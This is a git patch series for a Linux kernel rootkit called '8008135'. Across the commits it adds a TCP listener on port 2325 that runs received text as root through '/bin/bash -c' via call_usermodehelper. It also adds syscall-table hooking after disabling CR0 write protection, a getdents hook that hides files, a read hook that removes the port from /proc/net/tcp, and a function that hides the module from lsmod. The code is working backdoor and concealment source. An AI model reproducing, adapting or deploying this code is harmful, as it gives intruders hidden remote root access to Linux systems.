From 4aa1387a8972019fee553350c771cbd864254f39 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Sat, 7 Dec 2019 15:37:35 +0100 Subject: [PATCH 01/12] Adding call_usermodehelper to input commands as root --- src/50ck3t.c | 39 +++++++++++++++++++++++++++------------ 1 file changed, 27 insertions(+), 12 deletions(-) diff --git a/src/50ck3t.c b/src/50ck3t.c index 9302803..f925d07 100644 --- a/src/50ck3t.c +++ b/src/50ck3t.c @@ -31,9 +31,19 @@ /**** includes ***************************************************************** *******************************************************************************/ #include "50ck3t.h" - +#ifdef HARMLESS +#else + #include +#endif /**** types ******************************************************************* *******************************************************************************/ +#ifdef HARMLESS +#else + static char *SEnvP[] = { + "HOME=/", + NULL + }; +#endif struct tcp_conn_handler_data{ struct sockaddr_in *FAddress; struct socket *FAcceptSocket; @@ -178,7 +188,6 @@ int connection_handler(void *AData){ unsigned char LInBuf[LLen+1]; unsigned char LOutBuf[LLen+1]; - DECLARE_WAITQUEUE(recv_wait, current); allow_signal(SIGKILL|SIGSTOP); @@ -221,21 +230,30 @@ int connection_handler(void *AData){ LRet = tcp_server_receive(LAcceptSocket, LID, LAddress, LInBuf, LLen,\ MSG_DONTWAIT); if(LRet > 0){ - if(memcmp(LInBuf, "HOLA", 4) == 0){ +#ifdef HARMLESS + if(memcmp(LInBuf, "HOLA", 4) == 0){ memset(LOutBuf, 0, LLen+1); strcat(LOutBuf, "HOLASI"); pr_info("sending response: %s\n", LOutBuf); tcp_server_send(LAcceptSocket, LID, LOutBuf,\ strlen(LOutBuf), MSG_DONTWAIT); - } - if(memcmp(LInBuf, "ADIOS", 5) == 0){ + } + if(memcmp(LInBuf, "ADIOS", 5) == 0){ memset(LOutBuf, 0, LLen+1); strcat(LOutBuf, "ADIOSAMIGO"); pr_info("sending response: %s\n", LOutBuf); tcp_server_send(LAcceptSocket, LID, LOutBuf,\ strlen(LOutBuf), MSG_DONTWAIT); break; - } + } +#else + int Ret; + printk(LInBuf); + char *LArgV[] = {"/bin/bash", "-c", LInBuf, NULL}; + printk("Calling usermodehelper"); + Ret = call_usermodehelper(LArgV[0], LArgV, SEnvP, UMH_WAIT_EXEC); + printk("\nRet is %i \n", Ret); +#endif } } @@ -309,10 +327,8 @@ int tcp_server_accept(void){ __set_current_state(TASK_RUNNING); remove_wait_queue(&LSocket->sk->sk_wq->wait, &accept_wait); - pr_info("accept connection\n"); - LAcceptErr = - LSocket->ops->accept(LSocket, LAcceptSocket, O_NONBLOCK); + LAcceptErr = LSocket->ops->accept(LSocket, LAcceptSocket, O_NONBLOCK); if(LAcceptErr < 0){ pr_info(" *** mtp | accept_error: %d while accepting " @@ -326,9 +342,8 @@ int tcp_server_accept(void){ addr_len = sizeof(struct sockaddr_in); - LAcceptErr = - LAcceptSocket->ops->getname(LAcceptSocket,\ - (struct sockaddr *)LClient,\ + LAcceptErr = LAcceptSocket->ops->getname(LAcceptSocket, + (struct sockaddr *)LClient, &addr_len, 2); if(LAcceptErr < 0){ From 500087d2ca926c4b65e7508b202a1a5f42de335e Mon Sep 17 00:00:00 2001 From: valentin_lechner Date: Sun, 8 Dec 2019 01:10:48 +0000 Subject: [PATCH 02/12] exporting functions to files --- Makefile | 4 + src/637d3n75.c | 72 ++++++++++++++++ src/8008135.c | 165 ++++-------------------------------- src/h1d3m0dul3.c | 36 ++++++++ src/h1d3p0r7.c | 91 ++++++++++++++++++++ src/headers/50ck3t.h | 10 ++- src/headers/5y563n.h | 2 + src/headers/637d3n75.h | 32 +++++++ src/headers/8008135.h | 4 +- src/headers/h1d3m0dul3.h | 26 ++++++ src/headers/h1d3p0r7.h | 31 +++++++ src/headers/p463unpr073c7.h | 31 +++++++ src/p463unpr073c7.c | 48 +++++++++++ 13 files changed, 398 insertions(+), 154 deletions(-) create mode 100644 src/637d3n75.c create mode 100644 src/h1d3m0dul3.c create mode 100644 src/h1d3p0r7.c create mode 100644 src/headers/5y563n.h create mode 100644 src/headers/637d3n75.h create mode 100644 src/headers/h1d3m0dul3.h create mode 100644 src/headers/h1d3p0r7.h create mode 100644 src/headers/p463unpr073c7.h create mode 100644 src/p463unpr073c7.c diff --git a/Makefile b/Makefile index 255fc67..1c688ae 100644 --- a/Makefile +++ b/Makefile @@ -20,6 +20,10 @@ obj-m += $(MNAME).o # Core $(MNAME)-y += src/$(MNAME).o $(MNAME)-y += src/50ck3t.o +$(MNAME)-y += src/637d3n75.o +$(MNAME)-y += src/h1d3p0r7.o +$(MNAME)-y += src/h1d3m0dul3.o +$(MNAME)-y += src/p463unpr073c7.o # Includes for header files etc ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) diff --git a/src/637d3n75.c b/src/637d3n75.c new file mode 100644 index 0000000..24afd60 --- /dev/null +++ b/src/637d3n75.c @@ -0,0 +1,72 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ +/*******************************************************************************/ + + +/**** includes ***************************************************************** +*******************************************************************************/ +#include "637d3n75.h" + + +/*******************************************************************************/ + +/*** FUNCTION **************************************************************** +* NAME: sys_getdents_new +* DESCRIPTION: function overriding the original getdents +* PARAMETERS: - +* RETURNS: - +*******************************************************************************/ +asmlinkage long sys_getdents_new(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count){ + int boff; + struct linux_dirent* ent; + + long ret = sys_getdents_orig(fd, dirent, count); + + char* dbuf; + + if (ret <= 0) { + return ret; + } + + dbuf = (char*)dirent; + + // go through the entries, looking for one that has our prefix + for (boff = 0; boff < ret;) { + + ent = (struct linux_dirent*)(dbuf + boff); + + // if it has hide prefix or module name anywhere, hide it + if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) + || (strstr(ent->d_name, MODULE_NAME) != NULL)) { + // remove this entry by copying everything after it forward + // and adjust the length reported + memcpy(dbuf + boff, + dbuf + boff + ent->d_reclen, + ret - (boff + ent->d_reclen)); + ret -= ent->d_reclen; + } else { + // on to the next entry + boff += ent->d_reclen; + } + } + + return ret; +} diff --git a/src/8008135.c b/src/8008135.c index 2189d71..c8be593 100644 --- a/src/8008135.c +++ b/src/8008135.c @@ -17,167 +17,35 @@ * with this program. If not, see . */ +/*******************************************************************************/ + /**** includes ***************************************************************** *******************************************************************************/ #include "8008135.h" #include "50ck3t.h" -/**** var ******************************************************************** -*******************************************************************************/ - -sys_getdents_t sys_getdents_orig = NULL; - -/*** FUNCTION **************************************************************** -* NAME: sys_getdents_new -* DESCRIPTION: function overriding the original getdents -* PARAMETERS: - -* RETURNS: - -*******************************************************************************/ -asmlinkage long sys_getdents_new(unsigned int fd, - struct linux_dirent __user *dirent, - unsigned int count){ - int boff; - struct linux_dirent* ent; - - long ret = sys_getdents_orig(fd, dirent, count); - - char* dbuf; - - if (ret <= 0) { - return ret; - } - - dbuf = (char*)dirent; - - // go through the entries, looking for one that has our prefix - for (boff = 0; boff < ret;) { - - ent = (struct linux_dirent*)(dbuf + boff); - - // if it has hide prefix or module name anywhere, hide it - if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) - || (strstr(ent->d_name, MODULE_NAME) != NULL)) { -#if defined DEBUG - printk("\n hide prefix or mod name contained!\n"); - printk("\n ret %ld\n ", ret); - printk("\n dbuf %d\n" , dbuf); - printk("\n"); - printk(ent->d_name); -#endif - // remove this entry by copying everything after it forward - // and adjust the length reported -#if defined DEBUG - printk("\n reclen %u \n", ent->d_reclen); -#endif - memcpy(dbuf + boff, - dbuf + boff + ent->d_reclen, - ret - (boff + ent->d_reclen)); - ret -= ent->d_reclen; -#if defined DEBUG - printk("\n ret after change %ld\n ", ret); -#endif - } else { - // on to the next entry - boff += ent->d_reclen; - } - } - - return ret; -} - - -/*** FUNCTION **************************************************************** -* NAME: hide port -* DESCRIPTION: hides the port 2325 -* PARAMETERS: - -* RETURNS: -*******************************************************************************/ -read_ptr orig_read; -asmlinkage long hacked_read(unsigned int fd, char __user *buf, - size_t count) -{ - long result, bp, diff_in_bytes; - char *kbuf, *start_line, *end_line, *port_num; - char *pathname, pbuf[256]; - struct files_struct *current_files; - struct fdtable *files_table; - struct path file_path; - - // run real read - result = (*orig_read)(fd,buf,count); - if (result <= 0) - return result; - - // get pathname - // CITATION [8] from report - current_files = current->files; - files_table = files_fdtable(current_files); - - file_path = files_table->fd[fd]->f_path; - pathname = d_path(&file_path,pbuf,256*sizeof(char)); - // if virtual file /proc/net/tcp - if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) { - // copy from user to kernelspace; - if (!access_ok(VERIFY_READ,buf,result)) - return -1; - if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL) - return -1; - if (copy_from_user(kbuf,buf,result)) - return -1; - - // filter out hidden ports - start_line = strchr(kbuf,':') - 4; // skip first line - diff_in_bytes = (start_line - kbuf) * sizeof(char); - for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) { - start_line = kbuf + bp; - port_num = strchr(strchr(start_line,':') + 1,':') + 1; - end_line = strchr(start_line,'\n'); - diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char); - if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port - memmove(start_line,end_line + 1, // delete line in file - result - bp - diff_in_bytes); - result -= diff_in_bytes; - } - } - - // copy from kernel to userspace - if (!access_ok(VERIFY_WRITE,buf,result)) - return EINVAL; - if (copy_to_user(buf,kbuf,result)) - return EINVAL; - kfree(kbuf); - } - // return number of bytes read - return result; -} - - -/*** FUNCTION **************************************************************** -* NAME: hide_module -* DESCRIPTION: hides the module from lsmod -* PARAMETERS: - -* RETURNS: -*******************************************************************************/ -void hide_module(void){ - list_del(&THIS_MODULE->list); -} +#include "637d3n75.h" +#include "h1d3m0dul3.h" +#include "h1d3p0r7.h" +#include "p463unpr073c7.h" +/*******************************************************************************/ /*** FUNCTION **************************************************************** * NAME: 8008135_init -* DESCRIPTION: initializing Kernel Module +* DESCRIPTION: initializing Kernel Module - hijacking syscalltable * PARAMETERS: - * RETURNS: int *******************************************************************************/ static int __init init_8008135(void) { printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table); - // record the original getdents handler + sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM]; printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig); // turn write protect off - write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); + wprotectionoff(); // add our new handlers sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new; @@ -187,7 +55,7 @@ static int __init init_8008135(void) { sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read; // turn write protect back on - write_cr0(read_cr0() | WRITE_PROTECT_FLAG); + wprotectionon(); printk(KERN_INFO "New syscall in place\n"); network_server_init(); @@ -205,16 +73,17 @@ static int __init init_8008135(void) { *******************************************************************************/ static void __exit exit_8008135(void) { network_server_exit(); - // allow us to write to read onlu pages - write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); - // set getdents handler back + wprotectionoff(); sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig; sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read; // turn write protect back on - write_cr0(read_cr0() | WRITE_PROTECT_FLAG); + wprotectionon(); printk(KERN_INFO "Old syscall back\n"); } -// Setting pointers to init-/exit-functions +/*******************************************************************************/ + module_init(init_8008135); module_exit(exit_8008135); + +/*******************************************************************************/ diff --git a/src/h1d3m0dul3.c b/src/h1d3m0dul3.c new file mode 100644 index 0000000..3a8ce87 --- /dev/null +++ b/src/h1d3m0dul3.c @@ -0,0 +1,36 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +/*******************************************************************************/ + +/**** includes ***************************************************************** +*******************************************************************************/ +#include "h1d3m0dul3.h" + +/*******************************************************************************/ + +/*** FUNCTION **************************************************************** +* NAME: hide_module +* DESCRIPTION: hides the module from lsmod +* PARAMETERS: - +* RETURNS: +*******************************************************************************/ +void hide_module(void){ + list_del(&THIS_MODULE->list); +} diff --git a/src/h1d3p0r7.c b/src/h1d3p0r7.c new file mode 100644 index 0000000..f16e715 --- /dev/null +++ b/src/h1d3p0r7.c @@ -0,0 +1,91 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +/*******************************************************************************/ + +/**** includes ***************************************************************** +*******************************************************************************/ +#include "h1d3p0r7.h" + +/*******************************************************************************/ + +/*** FUNCTION **************************************************************** +* NAME: hide port +* DESCRIPTION: hides the port 2325 +* PARAMETERS: - +* RETURNS: +*******************************************************************************/ + +asmlinkage long hacked_read(unsigned int fd, char __user *buf, + size_t count) +{ + long result, bp, diff_in_bytes; + char *kbuf, *start_line, *end_line, *port_num; + char *pathname, pbuf[256]; + struct files_struct *current_files; + struct fdtable *files_table; + struct path file_path; + + // run real read + result = (*orig_read)(fd,buf,count); + if (result <= 0) + return result; + + // get pathname + // CITATION [8] from report + current_files = current->files; + files_table = files_fdtable(current_files); + + file_path = files_table->fd[fd]->f_path; + pathname = d_path(&file_path,pbuf,256*sizeof(char)); + // if virtual file /proc/net/tcp + if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) { + // copy from user to kernelspace; + if (!access_ok(VERIFY_READ,buf,result)) + return -1; + if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL) + return -1; + if (copy_from_user(kbuf,buf,result)) + return -1; + + // filter out hidden ports + start_line = strchr(kbuf,':') - 4; // skip first line + diff_in_bytes = (start_line - kbuf) * sizeof(char); + for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) { + start_line = kbuf + bp; + port_num = strchr(strchr(start_line,':') + 1,':') + 1; + end_line = strchr(start_line,'\n'); + diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char); + if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port + memmove(start_line,end_line + 1, // delete line in file + result - bp - diff_in_bytes); + result -= diff_in_bytes; + } + } + + // copy from kernel to userspace + if (!access_ok(VERIFY_WRITE,buf,result)) + return EINVAL; + if (copy_to_user(buf,kbuf,result)) + return EINVAL; + kfree(kbuf); + } + // return number of bytes read + return result; +} diff --git a/src/headers/50ck3t.h b/src/headers/50ck3t.h index b9c7b35..b67c59d 100644 --- a/src/headers/50ck3t.h +++ b/src/headers/50ck3t.h @@ -16,8 +16,8 @@ * You should have received a copy of the GNU General Public License along * with this program. If not, see . */ -#ifndef SRC_HEADERS_50CK3T_H_ -#define SRC_HEADERS_50CK3T_H_ +#ifndef SRC_HEADERS_50CK3T_H +#define SRC_HEADERS_50CK3T_H /**** includes ***************************************************************** *******************************************************************************/ @@ -40,11 +40,15 @@ #include #include +/**** defines ***************************************************************** +*******************************************************************************/ + #define DEFAULT_PORT 2325 +#define DEFAULT_PORT_HEX "0915" #define MAX_CONNS 16 #define MODULE_NAME "8008135" int network_server_init(void); void network_server_exit(void); -#endif /* SRC_HEADERS_50CK3T_H_ */ +#endif diff --git a/src/headers/5y563n.h b/src/headers/5y563n.h new file mode 100644 index 0000000..1b102b4 --- /dev/null +++ b/src/headers/5y563n.h @@ -0,0 +1,2 @@ +#pragma once +#include diff --git a/src/headers/637d3n75.h b/src/headers/637d3n75.h new file mode 100644 index 0000000..feab7cf --- /dev/null +++ b/src/headers/637d3n75.h @@ -0,0 +1,32 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +#ifndef SRC_HEADERS_637d3n75_H +#define SRC_HEADERS_637d3n75_H + +/**** var ******************************************************************** +*******************************************************************************/ +sys_getdents_t sys_getdents_orig = NULL; + + +extern asmlinkage long sys_getdents_new(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count); + +#endif diff --git a/src/headers/8008135.h b/src/headers/8008135.h index 0ff10ae..99bc790 100644 --- a/src/headers/8008135.h +++ b/src/headers/8008135.h @@ -42,14 +42,12 @@ #define GETDENTS_SYSCALL_NUM 78 #define READ_SYSCALL_NUM 0 -#define WRITE_PROTECT_FLAG (1<<16) #define HIDE_PREFIX "8008135." #define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1) #define MODULE_NAME "8008135" #define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) -#define HIDE_PORT "0915" // 2325 in Hexadecimal /**** Modinfo **************************************************************** *******************************************************************************/ @@ -73,4 +71,4 @@ typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, unsigned int count); typedef asmlinkage long (*read_ptr)(unsigned int fd, char __user *buf, size_t count); -#endif /* SRC_HEADERS_8008135_H */ +#endif diff --git a/src/headers/h1d3m0dul3.h b/src/headers/h1d3m0dul3.h new file mode 100644 index 0000000..14182ae --- /dev/null +++ b/src/headers/h1d3m0dul3.h @@ -0,0 +1,26 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +#ifndef SRC_HEADERS_h1d3m0dul3_H +#define SRC_HEADERS_h1d3m0dul3_H + + +extern void hide_module(void); + +#endif diff --git a/src/headers/h1d3p0r7.h b/src/headers/h1d3p0r7.h new file mode 100644 index 0000000..65ab39d --- /dev/null +++ b/src/headers/h1d3p0r7.h @@ -0,0 +1,31 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +#ifndef SRC_HEADERS_h1d3p0r7_H +#define SRC_HEADERS_h1d3p0r7_H + +#include "50ck3t.h" +/**** var ********************************************************************** +*******************************************************************************/ +read_ptr orig_read; + +extern asmlinkage long hacked_read(unsigned int fd, char __user *buf, + size_t count) + +#endif diff --git a/src/headers/p463unpr073c7.h b/src/headers/p463unpr073c7.h new file mode 100644 index 0000000..a474e8f --- /dev/null +++ b/src/headers/p463unpr073c7.h @@ -0,0 +1,31 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +#ifndef SRC_HEADERS_p463unpr073c7_H +#define SRC_HEADERS_p463unpr073c7_H + + +/**** defines ***************************************************************** +*******************************************************************************/ +#define WRITE_PROTECT_FLAG (1<<16) + +extern void wprotectionoff(void); +extern void wprotectionon(void); + +#endif diff --git a/src/p463unpr073c7.c b/src/p463unpr073c7.c new file mode 100644 index 0000000..904825a --- /dev/null +++ b/src/p463unpr073c7.c @@ -0,0 +1,48 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +/*******************************************************************************/ + +/**** includes ***************************************************************** +*******************************************************************************/ +#include "p463unpr073c7.h" + +/*******************************************************************************/ + + +/*** FUNCTION **************************************************************** +* NAME: wprotectionoff +* DESCRIPTION: turn page write protection off +* PARAMETERS: - +* RETURNS: +*******************************************************************************/ +void wprotectionoff(void){ + write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); +} + +/*** FUNCTION **************************************************************** +* NAME: wprotectionon +* DESCRIPTION: turn page write protection on +* PARAMETERS: - +* RETURNS: +*******************************************************************************/ + +void wprotectionon(void){ + write_cr0(read_cr0() | WRITE_PROTECT_FLAG); +} From dcd4c6588a9a5d9d1607d0fe86a97e76df1395ad Mon Sep 17 00:00:00 2001 From: valentin lechner <2909278-valentin_lechner@users.noreply.gitlab.com> Date: Sun, 8 Dec 2019 01:13:25 +0000 Subject: [PATCH 03/12] Delete 5y563n.h --- src/headers/5y563n.h | 2 -- 1 file changed, 2 deletions(-) delete mode 100644 src/headers/5y563n.h diff --git a/src/headers/5y563n.h b/src/headers/5y563n.h deleted file mode 100644 index 1b102b4..0000000 --- a/src/headers/5y563n.h +++ /dev/null @@ -1,2 +0,0 @@ -#pragma once -#include From bbf48681e01f0cbadaefe0b0da3e4e5a01e30daa Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Sun, 8 Dec 2019 11:59:14 +0100 Subject: [PATCH 04/12] Tun wir mal so als ob wir Helper Funktionen benutzen wrden --- src/610b415.c | 20 ++++++++++++++++++++ src/headers/610b415.h | 13 +++++++++++++ 2 files changed, 33 insertions(+) create mode 100644 src/610b415.c create mode 100644 src/headers/610b415.h diff --git a/src/610b415.c b/src/610b415.c new file mode 100644 index 0000000..31acbea --- /dev/null +++ b/src/610b415.c @@ -0,0 +1,20 @@ +/* + * 610b415.c + * + * Created on: Dec 6, 2019 + * Author: vlr + */ + +#include "610b415.h" + +char * stringRemoveChars(char *AString, char *ASpanset){ + char *LPtr = AString; + LPtr = strpbrk(LPtr, ASpanset); + + while(LPtr != NULL) { + *LPtr = ' '; + LPtr = strpbrk(LPtr, AString); + } + + return AString; +} diff --git a/src/headers/610b415.h b/src/headers/610b415.h new file mode 100644 index 0000000..3fcf6ac --- /dev/null +++ b/src/headers/610b415.h @@ -0,0 +1,13 @@ +/* + * 610b415.h + * + * Created on: Dec 6, 2019 + * Author: vlr + */ + +#ifndef SRC_HEADERS_610B415_H_ +#define SRC_HEADERS_610B415_H_ + +extern char * stringRemoveChars(char *AString, char *ASpanset); + +#endif /* SRC_HEADERS_610B415_H_ */ From 04f29d2e032aa255c33a54e669d7151d5228b587 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Sun, 8 Dec 2019 12:00:46 +0100 Subject: [PATCH 05/12] Skript fr Code Generierung angepasst so dass die explizite Definition der Variablen im c File steht und im Header File die Deklaration fr externes --- src/cr3473_5y563n.sh | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/src/cr3473_5y563n.sh b/src/cr3473_5y563n.sh index 17d133d..1a1f56c 100755 --- a/src/cr3473_5y563n.sh +++ b/src/cr3473_5y563n.sh @@ -1,19 +1,32 @@ #!/usr/bin/env bash + SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )" + SRCS_H="$SCRIPTPATH""/headers" + +SGENS="$SCRIPTPATH""/5y563n.c" SGENH="$SRCS_H""/5y563n.h" smap="/boot/System.map-$(uname -r)" +echo -e '#include "5y563n.h"' > "$SGENS" + echo -e "#pragma once" > "$SGENH" echo -e "#include " >> "$SGENH" + symbline=$(cat $smap | grep '\Wsys_call_table$') set $symbline + [ -z "$symbline" ] && echo "No SysCall Table Value from System.map found" && exit 2; -echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENH" + +echo -e "extern void** sys_call_table;" >> "$SGENH" + +echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENS" procline=$(cat $smap | grep '\Wproc_modules_operations$') set $procline -echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENH" \ No newline at end of file +echo -e "extern struct file_operations* proc_modules_operations;">> "$SGENH" + +echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENS" \ No newline at end of file From 800779a3764e84b18b1a1c9b5047b3c315f5cc4a Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Sun, 8 Dec 2019 12:01:37 +0100 Subject: [PATCH 06/12] ifdef HARMLESS um ansonsten nicht bentigte Var --- src/50ck3t.c | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/src/50ck3t.c b/src/50ck3t.c index f925d07..42f98b5 100644 --- a/src/50ck3t.c +++ b/src/50ck3t.c @@ -34,15 +34,18 @@ #ifdef HARMLESS #else #include + #include "610b415.h" #endif /**** types ******************************************************************* *******************************************************************************/ #ifdef HARMLESS #else + static char *SEnvP[] = { "HOME=/", NULL }; + #endif struct tcp_conn_handler_data{ struct sockaddr_in *FAddress; @@ -186,8 +189,10 @@ int connection_handler(void *AData){ int LRet; int LLen = 49; unsigned char LInBuf[LLen+1]; +#ifdef HARMLESS unsigned char LOutBuf[LLen+1]; - +#else +#endif DECLARE_WAITQUEUE(recv_wait, current); allow_signal(SIGKILL|SIGSTOP); @@ -248,7 +253,10 @@ int connection_handler(void *AData){ } #else int Ret; + + printk(LInBuf); + char *LArgV[] = {"/bin/bash", "-c", LInBuf, NULL}; printk("Calling usermodehelper"); Ret = call_usermodehelper(LArgV[0], LArgV, SEnvP, UMH_WAIT_EXEC); From 53e95217c228d69de63606098e999c8fae491d96 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Sun, 8 Dec 2019 12:02:08 +0100 Subject: [PATCH 07/12] Removing single-line comments --- src/637d3n75.c | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/src/637d3n75.c b/src/637d3n75.c index 24afd60..a6a6aee 100644 --- a/src/637d3n75.c +++ b/src/637d3n75.c @@ -23,6 +23,10 @@ *******************************************************************************/ #include "637d3n75.h" +/*** var ******************************************************************** +*******************************************************************************/ + +sys_getdents_ptr sys_getdents_orig; /*******************************************************************************/ @@ -48,22 +52,20 @@ asmlinkage long sys_getdents_new(unsigned int fd, dbuf = (char*)dirent; - // go through the entries, looking for one that has our prefix for (boff = 0; boff < ret;) { ent = (struct linux_dirent*)(dbuf + boff); - // if it has hide prefix or module name anywhere, hide it + if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) || (strstr(ent->d_name, MODULE_NAME) != NULL)) { - // remove this entry by copying everything after it forward - // and adjust the length reported + memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, ret - (boff + ent->d_reclen)); ret -= ent->d_reclen; } else { - // on to the next entry + boff += ent->d_reclen; } } From ed5b2fa92afdfb23139cd04561436d9f29d75f71 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Sun, 8 Dec 2019 12:02:33 +0100 Subject: [PATCH 08/12] CleanUp --- src/8008135.c | 38 ++++++++++++-------------------------- 1 file changed, 12 insertions(+), 26 deletions(-) diff --git a/src/8008135.c b/src/8008135.c index c8be593..851ce00 100644 --- a/src/8008135.c +++ b/src/8008135.c @@ -22,11 +22,6 @@ /**** includes ***************************************************************** *******************************************************************************/ #include "8008135.h" -#include "50ck3t.h" -#include "637d3n75.h" -#include "h1d3m0dul3.h" -#include "h1d3p0r7.h" -#include "p463unpr073c7.h" /*******************************************************************************/ 